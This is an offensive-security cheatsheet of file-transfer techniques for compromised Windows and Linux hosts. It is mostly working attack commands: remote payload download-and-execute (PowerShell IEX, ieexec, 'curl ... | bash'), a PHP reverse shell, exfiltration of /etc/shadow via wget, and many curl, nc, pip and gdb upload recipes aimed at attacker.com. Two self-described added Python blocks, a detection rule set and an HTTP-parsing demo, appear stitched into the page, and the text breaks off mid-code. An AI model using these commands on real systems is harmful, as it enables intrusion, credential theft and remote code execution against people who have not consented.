Ultimate - File Transfer Cheatsheet

File Transfer

What is this?

This is my cheatsheet for transferring files to and from target machines that are Windows or Linux hosts. It is divided into two sections:

  • Windows
  • Linux

In each section I have listed the main techniques that let you transfer files easily. The last part of each section, named Others, shows some additional tricks that may be useful on a very hardened system. I haven't needed any of those yet on the machines I have solved, but if the need arises they are something you could try.

Windows

Bitsadmin

bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file

Certutil

certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file

debug.exe

The debug.exe program acts as an assembler, disassembler, and hex dumping tool. We can take a binary such as netcat (nc.exe) and dump it into hex. A series of non-interactive echo commands then writes the binary out as its hex representation, and debug.exe reassembles that hex file into the original nc.exe on the compromised host. There is a 64 KB size limit on transferable files.

nc.exe is close to that limit. We can use upx (an executable packer) to compress it further:

On Kali : upx -9 nc.exe

The file size is now more suitable for transfer, having been reduced by almost 50%. We can now convert nc.exe into a text file usable by debug.exe on the compromised Windows host. The tool we'll be using is exe2bat.exe

Copy exe2bat to the current working directory, on Kali : cp /usr/share/windows-binaries/exe2bat.exe .

wine exe2bat.exe nc.exe nc.txt

This produces an nc.txt file that we can simply copy and paste into the remote Windows shell, and nc.exe will be created automatically on the compromised host.

OpenSSL

Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Serve the file on Kali : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
Execute on Windows box to transfer file to C:\file : C:\path\to\openssl.exe s_client -quiet -connect AttackerIP:1234 > C:\file

PowerShell

Within PowerShell

  • Invoke-WebRequest -Uri "http://AttackerIP/file" -OutFile "C:\path\to\file"
  • (New-Object Net.WebClient).downloadFile('http://10.10.14.45/shell.bat', 'C:\Users\Public\Downloads\shell.bat')

Outside PowerShell

powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://AttackerIP/file')

Non-Interactive PowerShell script

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://AttackerIP/file" >>wget.ps1
echo $file = "file" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

IWR "http://yourip/shell.exe" -OutFile "shell.exe" , use this in case you are transferring files over HTTP.

SMB

  • SMBserver.py

On Kali : python smbserver.py transfer_share /root/shells (the share path is the directory that contains shell.exe)

On Target Windows :

// We can then check that our SMB share is up and running from our compromised Windows host

net view \\AttackerIP

// Windows commands like dir and copy can also be used

dir \\AttackerIP\transfer_share
copy \\AttackerIP\transfer_share\shell.exe

// Executing shell.exe on compromised Windows host via our SMB share ~ transfer_share

C:> \\AttackerIP\transfer_share\shell.exe

  • Impacket-SMBServer

On Kali : impacket-smbserver ShareName SharePath

On Windows (PowerShell) : New-PSDrive -Name ShareName -PSProvider "FileSystem" -Root "\\Kali-IP\ShareName"

If this has to be done natively (without Impacket), a Samba usershare can be used : net usershare add test /mount '' 'Everyone:F' guest_ok=y ; you would probably point this at a Docker container's share.

TFTP

tftp -i AttackerIP get file

FTP

On Kali : apt-get install python-pyftpdlib && python -m pyftpdlib -p 21

With the server up and running, we can transfer files interactively or non-interactively:

  • Interactively :
    //Interactive
    C:> ftp AttackerIP
    Connected to AttackerIP
    User: anonymous
    Password: anonymous
    ...
    ftp> binary
    ftp> get shell.exe
  • Non-Interactive :
    //Non-Interactive
    C:> echo open AttackerIP > c:\ftp.txt
    C:> echo anonymous >> c:\ftp.txt
    C:> echo anonymous >> c:\ftp.txt
    C:> echo binary >> c:\ftp.txt
    C:> echo get shell.exe >> c:\ftp.txt
    C:> echo bye >> c:\ftp.txt
    C:> ftp -s:C:\ftp.txt

Visual Basic Script (VBS)

  • Option 1 :
    // Paste each line separately into the Windows shell
    echo strUrl = WScript.Arguments.Item(0) > wget.vbs
    echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
    echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
    echo Err.Clear >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
    echo http.Open "GET", strURL, False >> wget.vbs
    echo http.Send >> wget.vbs
    echo varByteArray = http.ResponseBody >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
    echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
    echo strData = "" >> wget.vbs
    echo strBuffer = "" >> wget.vbs
    echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
    echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
    echo Next >> wget.vbs
    echo ts.Close >> wget.vbs

cscript wget.vbs http://AttackerIP/file file

  • Option 2 :
    echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs

cscript transfer.vbs

Others

  • bitsadmin.exe
    Create a bitsadmin job named 1, add the remote file to the job, then resume and complete the job.
    bitsadmin /create 1
    bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
    bitsadmin /RESUME 1
    bitsadmin /complete 1

Privileges required : User

  • certutil.exe
    Download and save 7zip to disk in the current folder.
    certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Privileges required : User

Download and save 7zip to disk in the current folder.
certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Privileges required : User

  • desktopimgdownldr.exe

Download
Downloads the file and sets it as the computer’s lockscreen
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Usecase : Download arbitrary files from a web server

  • Esentutl.exe

Download : Copies the source EXE to the destination EXE file
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Usecase : Use to copy files from one UNC path to another

  • Expand.exe

Download : Copies source file to destination.
expand \\webdav\folder\file.bat c:\ADS\file.bat
Usecase : Use to copy the source file to the destination file

  • Extrac32.exe

Download
Copy the source file to the destination file and overwrite it.
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Usecase : Download a file from a UNC/WebDAV path

  • Findstr.exe

Download
Searches for the string W3AllLov3DonaldTrump; since it does not exist, /V prints every line, so the content of file.exe is written to the target file.
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Usecase : Download/Copy file from webdav server

  • Ftp.exe

Download
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Usecase : Spawn new process using ftp.exe. Ftp.exe downloads the binary.

  • GfxDownloadWrapper.exe

Download
GfxDownloadWrapper.exe downloads the content returned by URL and writes it to DESTINATION FILE PATH. The binary is signed by “Microsoft Windows Hardware Compatibility Publisher”, “Microsoft Windows Third Party Component CA 2012”, “Microsoft Time-Stamp PCA 2010” and “Microsoft Time-Stamp Service”.
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Usecase : Download file from internet

  • Hh.exe

Download
Open the target PowerShell script with HTML Help.
HH.exe http://some.url/script.ps1
Usecase : Download files from url

  • Ieexec.exe

Download
Downloads and executes bypass.exe from the remote server.
ieexec.exe http://x.x.x.x:8080/bypass.exe
Usecase : Download and run attacker code from remote location

  • Makecab.exe

Download
Downloads the source file, compresses it and stores it in the target .cab file.
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Usecase : Download file and compress into a cab file

  • Replace.exe

Download
Download/Copy bar.exe to outdir
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Usecase : Download file

  • Excel.exe

Download
Downloads payload from remote server
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Usecase : It will download a remote payload and place it in the cache folder

  • Powerpnt.exe

Download
Downloads payload from remote server
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

  • Squirrel.exe

Download
The binary goes to the URL, looks for a RELEASES file and downloads the referenced NuGet package.
squirrel.exe --download [url to package]
Usecase : Download binary

  • Update.exe

Download
The binary goes to the URL, looks for a RELEASES file and downloads the referenced NuGet package.
Update.exe --download [url to package]
Usecase : Download binary

  • Winword.exe

Download
Downloads payload from remote server
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

  • Wsl.exe

Download
Downloads file from 192.168.1.10
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Usecase : Download file
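For the defender's side of the Windows section above: this Python snippet (an added example written for this page, not part of the original cheatsheet) turns the download primitives listed there into command-line detection rules and runs them over a few constructed process-creation command lines. The rule labels and sample lines are my own; the script-file PowerShell variant is included to show the limit of command-line matching, since the URL lives inside wget.ps1 and only script block logging or file monitoring would see it.

```python
import re

# Each rule pairs a label with a pattern derived from one of the Windows download
# primitives listed in this cheatsheet. Matching is case-insensitive because
# cmd.exe and PowerShell accept any casing for binaries and switches. The rules
# are deliberately broad (e.g. "replace" also matches PowerShell's -replace when
# a UNC path follows) and are meant to be tuned against real telemetry.
RULES = [
    ("certutil urlcache download",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*-split\b", re.I)),
    ("certutil verifyctl download",
     re.compile(r"\bcertutil(\.exe)?\b.*-verifyctl\b.*-split\b", re.I)),
    ("bitsadmin transfer job",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/(transfer|addfile)\b.*https?://", re.I)),
    ("PowerShell WebClient / IWR download",
     re.compile(r"\bpowershell(\.exe)?\b.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I)),
    ("scripted ftp session",
     re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)),
    ("LOLBin copy from a UNC/WebDAV path",
     re.compile(r"\b(findstr|expand|extrac32|esentutl|makecab|replace)(\.exe)?\b.*\\\\[^\s\\]+\\", re.I)),
    ("desktopimgdownldr lockscreen fetch",
     re.compile(r"\bdesktopimgdownldr(\.exe)?\b.*/lockscreenurl:", re.I)),
    ("hh / ieexec launched with a URL",
     re.compile(r"\b(hh|ieexec)(\.exe)?\s+\"?https?://", re.I)),
    ("Office binary launched with a remote payload",
     re.compile(r"\b(excel|powerpnt|winword)(\.exe)?\s+\"?https?://", re.I)),
    ("wsl /dev/tcp download",
     re.compile(r"\bwsl(\.exe)?\b.*/dev/tcp/", re.I)),
]

# Constructed process-creation command lines (the CommandLine field of a Sysmon
# event 1 or Security 4688 record); not taken from any real host.
SAMPLE_COMMAND_LINES = [
    r"certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file",
    r"bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file",
    r"powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://AttackerIP/file')",
    r"findstr /V /L NotThere \\webdavserver\folder\file.exe > c:\ADS\file.exe",
    r"wsl.exe --exec bash -c 'cat < /dev/tcp/AttackerIP/54 > binary'",
    # Script-file variant: the URL is inside wget.ps1, so the command line looks clean.
    r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    # Benign administrative use of the same binaries.
    r"certutil -hashfile C:\Windows\notepad.exe SHA256",
    r"findstr /i error C:\logs\app.log",
]


def classify(cmdline):
    """Return the labels of every rule matching one command line (empty list if none)."""
    return [label for label, pattern in RULES if pattern.search(cmdline)]


def scan(cmdlines):
    """Return (command line, labels) for each line that matched at least one rule."""
    hits = []
    for line in cmdlines:
        labels = classify(line)
        if labels:
            hits.append((line, labels))
    return hits


if __name__ == "__main__":
    for line, labels in scan(SAMPLE_COMMAND_LINES):
        print(f"{', '.join(labels)}: {line}")
```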


Linux

Bash

cat backup.7z > /dev/tcp/10.10.14.3/9001

curl

curl http://AttackerIP/file --output /var/tmp/file

curl AttackerIP/linenum.sh | bash

# upload to SMB server

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.48/1234 0>&1'");
phpinfo();
?>

fetch (FreeBSD)

fetch -o /var/tmp/file "http://AttackerIP/file"

netcat

nc -nlvp 1234 < file

cat file | nc AttackerIP 1234

Transferring files with progress in nc :

On Server Side : cat backup.iso | pv -b | nc -l 3333

On Client Side : nc 192.168.0.1 3333 | pv -b > backup.iso

Preferably run pv on our side, since we know the dependency is installed there : nc -lvp 1235 | pv -b > file

OpenSSL

Generate Keys (on Kali) : openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Serve file (on Kali) : openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
Execute on Linux host to GET the file : openssl s_client -quiet -connect AttackerIP:1234 > file
Note that s_client does not abort on an untrusted certificate by default, so the transfer is encrypted but the server is not authenticated.

Python

#!/usr/bin/python
# download.py - Python 2 (urllib2): fetch the file over HTTP and write it locally
import urllib2

u = urllib2.urlopen('http://AttackerIP/file')
localFile = open('local_file', 'wb')  # binary mode so executables are not mangled
localFile.write(u.read())
localFile.close()

chmod +x download.py

python download.py

rsync

  • Download Folder : rsync -r rsync://user@ip/<remote_dir>/ .
  • Upload Folder : rsync -vvaP -6 <local dir> "rsync://user@ip/<remote dir>"

SCP

  • To download file from remote system (remote -> local) : scp user@remote_host:remote_file local_file
  • To upload file to remote server (local -> remote): scp local_file user@remote_host:remote_file

socat

socat TCP4-LISTEN:8000,fork file:<file to transfer> // server
socat TCP4:<ip>:8000 file:<file to get>,create // client

wget

wget http://AttackerIP/file -O /var/tmp/file
sudo wget --post-file=/etc/shadow 10.10.10.142

Others

  • bash

1.1

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

1.2

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
  • cpan
export URL=http://attacker.com/file_to_get
cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
  • Curl

  • File upload
    It can exfiltrate files on the network.
    Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the @ to send hard-coded data.

URL=http://attacker.com/
LFILE=file_to_send
curl -X POST --data-binary @$LFILE $URL

File download
It can download remote files.

Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE
  • Easy Install

File Upload
It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    export URL=http://attacker.com/
    export LFILE=file_to_send
    TF=$(mktemp -d)
    echo 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
    easy_install $TF
  • Serve files in the local folder running an HTTP server.

    export LPORT=8888
    TF=$(mktemp -d)
    echo 'import sys; from os import environ as e
    if sys.version_info.major == 3: import http.server as s, socketserver as ss
    else: import SimpleHTTPServer as s, SocketServer as ss
    ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
    easy_install $TF

File Download
It can download remote files. Fetch a remote file via HTTP GET request. The file path must be absolute.

export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(command -v python)', '$(command -v python)', '-c', \"\"\"import sys;
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
easy_install $TF
  • Finger

File Upload : It can exfiltrate files on the network.

Send a binary file to a TCP port. Run sudo nc -l -p 79 | base64 -d > "file_to_save" on the attacker box to collect the file. The file length is limited by the maximum size of arguments.

RHOST=attacker.com
LFILE=file_to_send
finger "$(base64 $LFILE)@$RHOST"

File Download
It can download remote files. Fetch a remote binary file from a remote TCP port. Run base64 "file_to_send" | sudo nc -l -p 79 on the attacker box to send the file.

RHOST=attacker.com
LFILE=file_to_save
finger x@$RHOST | base64 -d > "$LFILE"
  • ftp

File Upload.
It can exfiltrate files on the network. Send local file to a FTP server.

RHOST=attacker.com
ftp $RHOST
put file_to_send

File Download
It can download remote files. Fetch a remote file from a FTP server.

RHOST=attacker.com
ftp $RHOST
get file_to_get
  • GDB

File upload

It can exfiltrate files on the network.

  • This requires that GDB is compiled with Python support. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    export URL=http://attacker.com/
    export LFILE=file_to_send
    gdb -nx -ex 'python import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' -ex quit
  • This requires that GDB is compiled with Python support. Serve files in the local folder running an HTTP server.

    export LPORT=8888
    gdb -nx -ex 'python import sys; from os import environ as e
    if sys.version_info.major == 3: import http.server as s, socketserver as ss
    else: import SimpleHTTPServer as s, SocketServer as ss
    ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit

File Download

It can download remote files.
This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' -ex quit
  • GIMP

File upload : It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    export URL=http://attacker.com/
    export LFILE=file_to_send
    gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'

Serve files in the local folder running an HTTP server.

export LPORT=8888
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'

File download : It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'
  • IRB

File upload : It can exfiltrate files on the network. Serve files in the local folder running an HTTP server on port 8888.

irb
require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;

File download : It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
irb
require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['LFILE'])
  • JJS

File download : It can download remote files. Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
echo "var URL = Java.type('java.net.URL');
var ws = new URL('$URL');
var Channels = Java.type('java.nio.channels.Channels');
var rbc = Channels.newChannel(ws.openStream());
var FileOutputStream = Java.type('java.io.FileOutputStream');
var fos = new FileOutputStream('$LFILE');
fos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);
fos.close();
rbc.close();" | jjs
  • jrunscript

File download : It can download remote files. Fetch a remote file via HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
jrunscript -e "cp('$URL','$LFILE')"
  • ksh

File upload : It can exfiltrate files on the network.

  • Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
    export RHOST=attacker.com
    export RPORT=12345
    export LFILE=file_to_send
    ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
  • Send local file using a TCP connection. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.
    export RHOST=attacker.com
    export RPORT=12345
    export LFILE=file_to_send
    ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'

File download : It can download remote files. Fetch a remote file via HTTP GET request.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
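The header-skipping loop used by the bash and ksh /dev/tcp HTTP downloaders on this page (read lines until one is exactly a bare carriage return, then cat the rest) assumes the server terminates header lines with CRLF. This added example (my own, not from the page) models that loop in Python beside a tolerant split so the failure mode is visible: a server answering with bare LF makes the loop swallow the whole response and the saved file ends up empty. The sample responses are constructed.

```python
# Constructed responses, as the /dev/tcp loop would read them from the socket.
CRLF_RESPONSE = b"HTTP/1.0 200 OK\r\nContent-Length: 11\r\n\r\nhello world"
LF_RESPONSE = b"HTTP/1.0 200 OK\nContent-Length: 11\n\nhello world"


def bash_style_body(raw):
    r"""Model `while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat`:
    consume newline-terminated lines until one is exactly a bare CR, then hand the
    remainder to cat. If no such line exists, the loop reads to EOF and cat gets nothing."""
    pos = 0
    while True:
        nl = raw.find(b"\n", pos)
        if nl == -1:
            return b""  # the loop consumed everything, body included
        line, pos = raw[pos:nl], nl + 1
        if line == b"\r":
            return raw[pos:]


def tolerant_body(raw):
    """Split headers from body at the first blank line, accepting CRLF or bare LF,
    and truncate to Content-Length when the server sends one. Returns None when
    the header terminator never arrived (incomplete response)."""
    found = [(raw.find(sep), len(sep)) for sep in (b"\r\n\r\n", b"\n\n")]
    found = [(i, n) for i, n in found if i != -1]
    if not found:
        return None
    i, n = min(found)  # earliest terminator wins
    head, body = raw[:i], raw[i + n:]
    for field in head.split(b"\n"):
        name, _, value = field.strip(b"\r").partition(b":")
        if name.strip().lower() == b"content-length":
            body = body[:int(value.strip())]
    return body


if __name__ == "__main__":
    for label, raw in (("CRLF", CRLF_RESPONSE), ("LF", LF_RESPONSE)):
        print(label, "bash loop ->", bash_style_body(raw), "tolerant ->", tolerant_body(raw))
```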

Fetch remote file using a TCP connection. Run nc -l -p 12345 < "file_to_send" on the attacker box to send the file.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
  • LUA

File upload : It can exfiltrate files on the network.
Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires lua-socket installed.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
lua -e '
local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'

File download : It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires lua-socket installed.

export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
  • nc

File upload. It can exfiltrate files on the network. Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"

File download. It can download remote files. Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file.

LPORT=12345
LFILE=file_to_save
nc -l -p $LPORT > "$LFILE"
  • nmap

File upload : It can exfiltrate files on the network.

  • Send a local file via TCP. Run socat -v tcp-listen:8080,reuseaddr,fork on the attacker box to collect the file, or use a proper HTTP server. Note that multiple connections are made to the server. It is also important that the port is a commonly used HTTP port like 80 or 8080.

RHOST=attacker.com
RPORT=8080
LFILE=file_to_send
nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE
  • Send a local file via TCP. Run nc -l -p 12345 > “file_to_save” on the attacker box to collect the file.
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
TF=$(mktemp)
echo 'local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();' > $TF
nmap --script=$TF

File download : It can download remote files.

  • Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., php -S 0.0.0.0:8080. Note that multiple connections are made to the server and the result is placed in $TF/IP/PORT/PATH. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
RHOST=attacker.com
RPORT=8080
TF=$(mktemp -d)
LFILE=file_to_save
nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE
  • Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file.
export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);' > $TF
nmap --script=$TF
  • openssl

File upload : It can exfiltrate files on the network. To collect the file run the following on the attacker box:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save

Send a local file via TCP. Transmission will be encrypted.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE"

File download
It can download remote files. To send the file run the following on the attacker box:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send

Fetch a file from a TCP port, transmission will be encrypted.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"
  • php

File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.

LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT

File download. It can download remote files. Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
  • pip

File upload.

It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
export URL=http://attacker.com/
export LFILE=file_to_send
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' > $TF/setup.py
pip install $TF
  • Serve files in the local folder running an HTTP server.
export LPORT=8888
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
pip install $TF

File download.

It can download remote files.
Fetch a remote file via HTTP GET request. It needs an absolute local file path.

export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' > $TF/setup.py
pip install $TF
  • python

File upload.

It can exfiltrate files on the network.

  • Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

    export URL=http://attacker.com/
    export LFILE=file_to_send
    python -c 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
